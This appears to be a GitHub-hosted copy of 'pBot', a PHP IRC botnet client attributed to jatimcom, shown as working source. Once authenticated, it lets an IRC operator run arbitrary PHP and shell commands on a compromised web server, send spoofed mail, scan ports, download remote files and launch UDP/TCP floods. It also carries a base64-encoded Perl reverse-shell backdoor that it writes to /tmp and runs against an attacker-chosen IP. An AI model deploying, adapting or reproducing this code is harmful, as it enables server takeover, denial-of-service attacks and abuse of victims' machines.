| if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) | |
| $this->start(); | |
| $ident = $this->config['prefix']; | |
| $alph = range("0","9"); | |
| for($i=0;$i<$this->config['maxrand'];$i++) | |
| $ident .= $alph[rand(0,9)]; | |
| if(strlen($this->config['pass'])>0) | |
| $this->send("PASS ".$this->config['pass']); | |
| $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname().""); | |
| $this->set_nick(); | |
| $this->main(); | |
| } | |
| function main() | |
| { | |
| while(!feof($this->conn)) | |
| { | |
| $this->buf = trim(fgets($this->conn,512)); | |
| $cmd = explode(" ",$this->buf); | |
| if(substr($this->buf,0,6)=="PING :") | |
| { | |
| $this->send("PONG :".substr($this->buf,6)); | |
| } | |
| if(isset($cmd[1]) && $cmd[1] =="001") | |
| { | |
| $this->send("MODE ".$this->nick." ".$this->config['modes']); | |
| $this->join($this->config['chan'],$this->config['key']); | |
| if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } | |
| else { $safemode = "off"; } | |
| $uname = php_uname(); | |
| $this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)"); | |
| } | |
| if(isset($cmd[1]) && $cmd[1]=="433") | |
| { | |
| $this->set_nick(); | |
| } | |
| if($this->buf != $old_buf) | |
| { | |
| $mcmd = array(); | |
| $msg = substr(strstr($this->buf," :"),2); | |
| $msgcmd = explode(" ",$msg); | |
| $nick = explode("!",$cmd[0]); | |
| $vhost = explode("@",$nick[1]); | |
| $vhost = $vhost[1]; | |
| $nick = substr($nick[0],1); | |
| $host = $cmd[0]; | |
| if($msgcmd[0]==$this->nick) | |
| { | |
| for($i=0;$i<count($msgcmd);$i++) | |
| $mcmd[$i] = $msgcmd[$i+1]; | |
| } | |
| else | |
| { | |
| for($i=0;$i<count($msgcmd);$i++) | |
| $mcmd[$i] = $msgcmd[$i]; | |
| } | |
| if(count($cmd)>2) | |
| { | |
| switch($cmd[1]) | |
| { | |
| case "QUIT": | |
| if($this->is_logged_in($host)) | |
| { | |
| $this->log_out($host); | |
| } | |
| break; | |
| case "PART": | |
| if($this->is_logged_in($host)) | |
| { | |
| $this->log_out($host); | |
| } | |
| break; | |
| case "PRIVMSG": | |
| if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*")) | |
| { | |
| if(substr($mcmd[0],0,1)==".") | |
| { | |
| switch(substr($mcmd[0],1)) | |
| { | |
| case "user": | |
| if($mcmd[1]==$this->config['password']) | |
| { | |
| $this->privmsg($this->config['chan'],"[\2Auth\2]: OK $nick You Are Ready... My OwnER !!!!!!!!!!!!!!!!!!!!"); | |
| $this->log_in($host); | |
| } | |
| else | |
| { | |
| $this->privmsg($this->config['chan'],"[\2Auth\2]: FUCK YOU.....!!!! $nick !!!!"); | |
| } | |
| break; | |
| } | |
| } | |
| } | |
| elseif($this->is_logged_in($host)) | |
| { | |
| if(substr($mcmd[0],0,1)==".") | |
| { | |
| switch(substr($mcmd[0],1)) | |
| { | |
| case "restart": | |
| $this->send("QUIT :restart commando from $nick"); | |
| fclose($this->conn); | |
| $this->start(); | |
| break; | |
| case "mail": //mail to from subject message | |
| if(count($mcmd)>4) | |
| { | |
| $header = "From: <".$mcmd[2].">"; | |
| if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) | |
| { | |
| $this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail."); | |
| } | |
| else | |
| { | |
| $this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2"); | |
| } | |
| } | |
| break; | |
| case "safe": | |
| if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") | |
| { | |
| $safemode = "on"; | |
| } | |
| else { | |
| $safemode = "off"; | |
| } | |
| $this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode.""); | |
| break; | |
| case "inbox": //teste inbox | |
| if(isset($mcmd[1])) | |
| { | |
| $token = md5(uniqid(rand(), true)); | |
| $header = "From: <inbox".$token."@jatimcom.cok>"; | |
| $a = php_uname(); | |
| $b = getenv("SERVER_SOFTWARE"); | |
| $c = gethostbyname($_SERVER["HTTP_HOST"]); | |
| if(!mail($mcmd[1],"InBox Test","#crew@jatimcom. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <[email protected]>",$header)) | |
| { | |
| $this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send"); | |
| } | |
| else | |
| { | |
| $this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2"); | |
| } | |
| } | |
| break; | |
| case "conback": | |
| if(count($mcmd)>2) | |
| { | |
| $this->conback($mcmd[1],$mcmd[2]); | |
| } | |
| break; | |
| case "dns": | |
| if(isset($mcmd[1])) | |
| { | |
| $ip = explode(".",$mcmd[1]); | |
| if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) | |
| { | |
| $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); | |
| } | |
| else | |
| { | |
| $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); | |
| } | |
| } | |
| break; | |
| case "info": | |
| case "vunl": | |
| if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } | |
| else { $safemode = "off"; } | |
| $uname = php_uname(); | |
| $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)"); | |
| $this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI'].""); | |
| break; | |
| case "bot": | |
| $this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 recording by jatimcom."); | |
| break; | |
| case "uname": | |
| if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } | |
| else { $safemode = "off"; } | |
| $uname = php_uname(); | |
| $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)"); | |
| break; | |
| case "rndnick": | |
| $this->set_nick(); | |
| break; | |
| case "raw": | |
| $this->send(strstr($msg,$mcmd[1])); | |
| break; | |
| case "eval": | |
| $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1]))); | |
| break; | |
| case "sexec": | |
| $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); | |
| $exec = shell_exec($command); | |
| $ret = explode("\n",$exec); | |
| for($i=0;$i<count($ret);$i++) | |
| if($ret[$i]!=NULL) | |
| $this->privmsg($this->config['chan']," : ".trim($ret[$i])); | |
| break; | |
| case "exec": | |
| $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); | |
| $exec = exec($command); | |
| $ret = explode("\n",$exec); | |
| for($i=0;$i<count($ret);$i++) | |
| if($ret[$i]!=NULL) | |
| $this->privmsg($this->config['chan']," : ".trim($ret[$i])); | |
| break; | |
| case "passthru": | |
| $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); | |
| $exec = passthru($command); | |
| $ret = explode("\n",$exec); | |
| for($i=0;$i<count($ret);$i++) | |
| if($ret[$i]!=NULL) | |
| $this->privmsg($this->config['chan']," : ".trim($ret[$i])); | |
| break; | |
| case "popen": | |
| if(isset($mcmd[1])) | |
| { | |
| $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); | |
| $this->privmsg($this->config['chan'],"[\2popen\2]: $command"); | |
| $pipe = popen($command,"r"); | |
| while(!feof($pipe)) | |
| { | |
| $pbuf = trim(fgets($pipe,512)); | |
| if($pbuf != NULL) | |
| $this->privmsg($this->config['chan']," : $pbuf"); | |
| } | |
| pclose($pipe); | |
| } | |
| case "system": | |
| $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); | |
| $exec = system($command); | |
| $ret = explode("\n",$exec); | |
| for($i=0;$i<count($ret);$i++) | |
| if($ret[$i]!=NULL) | |
| $this->privmsg($this->config['chan']," : ".trim($ret[$i])); | |
| break; | |
| case "pscan": // .pscan 127.0.0.1 6667 | |
| if(count($mcmd) > 2) | |
| { | |
| if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) | |
| $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2"); | |
| else | |
| $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2"); | |
| } | |
| break; | |
| case "download": | |
| if(count($mcmd) > 2) | |
| { | |
| if(!$fp = fopen($mcmd[2],"w")) | |
| { | |
| $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada."); | |
| } | |
| else | |
| { | |
| if(!$get = file($mcmd[1])) | |
| { | |
| $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2"); | |
| } | |
| else | |
| { | |
| for($i=0;$i<=count($get);$i++) | |
| { | |
| fwrite($fp,$get[$i]); | |
| } | |
| $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2"); | |
| } | |
| fclose($fp); | |
| } | |
| } | |
| else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); } | |
| break; | |
| case "die": | |
| $this->send("QUIT : $nick Ouuugghhhhh Yesssss"); | |
| fclose($this->conn); | |
| exit; | |
| case "logout": | |
| $this->log_out($host); | |
| $this->privmsg($this->config['chan'],"[\2auth\2]: $nick Ndang Cewok Lek Wes Mari!!!!"); | |
| break; | |
| case "udpflood": | |
| if(count($mcmd)>3) | |
| { | |
| $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]); | |
| } | |
| break; | |
| case "tcpflood": | |
| if(count($mcmd)>5) | |
| { | |
| $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); | |
| } | |
| break; | |
| } | |
| } | |
| } | |
| break; | |
| } | |
| } | |
| } | |
| $old_buf = $this->buf; | |
| } | |
| $this->start(); | |
| } | |
| function send($msg) | |
| { | |
| fwrite($this->conn,"$msg\r\n"); | |
| } | |
| function join($chan,$key=NULL) | |
| { | |
| $this->send("JOIN $chan $key"); | |
| } | |
| function privmsg($to,$msg) | |
| { | |
| $this->send("PRIVMSG $to :$msg"); | |
| } | |
| function notice($to,$msg) | |
| { | |
| $this->send("NOTICE $to :$msg"); | |
| } | |
| function is_logged_in($host) | |
| { | |
| if(isset($this->users[$host])) | |
| return 1; | |
| else | |
| return 0; | |
| } | |
| function log_in($host) | |
| { | |
| $this->users[$host] = true; | |
| } | |
| function log_out($host) | |
| { | |
| unset($this->users[$host]); | |
| } | |
| function set_nick() | |
| { | |
| if(isset($_SERVER['SERVER_SOFTWARE'])) | |
| { | |
| if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) | |
| $this->nick = "[A]"; | |
| elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) | |
| $this->nick = "[B]"; | |
| elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) | |
| $this->nick = "[C]"; | |
| else | |
| $this->nick = "[D]"; | |
| } | |
| else | |
| { | |
| $this->nick = "[E]"; | |
| } | |
| $this->nick .= $this->config['prefix']; | |
| for($i=0;$i<$this->config['maxrand'];$i++) | |
| $this->nick .= mt_rand(0,9); | |
| $this->send("NICK ".$this->nick); | |
| } | |
| function udpflood($host,$packetsize,$time) { | |
| $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]"); | |
| $packet = ""; | |
| for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); } | |
| $timei = time(); | |
| $i = 0; | |
| while(time()-$timei < $time) { | |
| $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5); | |
| fwrite($fp,$packet); | |
| fclose($fp); | |
| $i++; | |
| } | |
| $env = $i * $packetsize; | |
| $env = $env / 1048576; | |
| $vel = $env / $time; | |
| $vel = round($vel); | |
| $env = round($env); | |
| $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s "); | |
| } | |
| function tcpflood($host,$packets,$packetsize,$port,$delay) | |
| { | |
| $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]"); | |
| $packet = ""; | |
| for($i=0;$i<$packetsize;$i++) | |
| $packet .= chr(mt_rand(1,256)); | |
| for($i=0;$i<$packets;$i++) | |
| { | |
| if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) | |
| { | |
| $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>"); | |
| return 0; | |
| } | |
| else | |
| { | |
| fwrite($fp,$packet); | |
| fclose($fp); | |
| } | |
| sleep($delay); | |
| } | |
| $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port."); | |
| } | |
| function conback($ip,$port) | |
| { | |
| $this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port"); | |
| $dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw=="; | |
| if (is_writable("/tmp")) | |
| { | |
| if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); } | |
| $fp=fopen("/tmp/dc.pl","w"); | |
| fwrite($fp,base64_decode($dc_source)); | |
| passthru("perl /tmp/dc.pl $ip $port &"); | |
| unlink("/tmp/dc.pl"); | |
| } | |
| else | |
| { | |
| if (is_writable("/var/tmp")) | |
| { | |
| if (file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); } | |
| $fp=fopen("/var/tmp/dc.pl","w"); | |
| fwrite($fp,base64_decode($dc_source)); | |
| passthru("perl /var/tmp/dc.pl $ip $port &"); | |
| unlink("/var/tmp/dc.pl"); | |
| } | |
| if (is_writable(".")) | |
| { | |
| if (file_exists("dc.pl")) { unlink("dc.pl"); } | |
| $fp=fopen("dc.pl","w"); | |
| fwrite($fp,base64_decode($dc_source)); | |
| passthru("perl dc.pl $ip $port &"); | |
| unlink("dc.pl"); | |
| } | |
| } | |
| } | |
| } | |
| $bot = new pBot; | |
| $bot->start(); | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment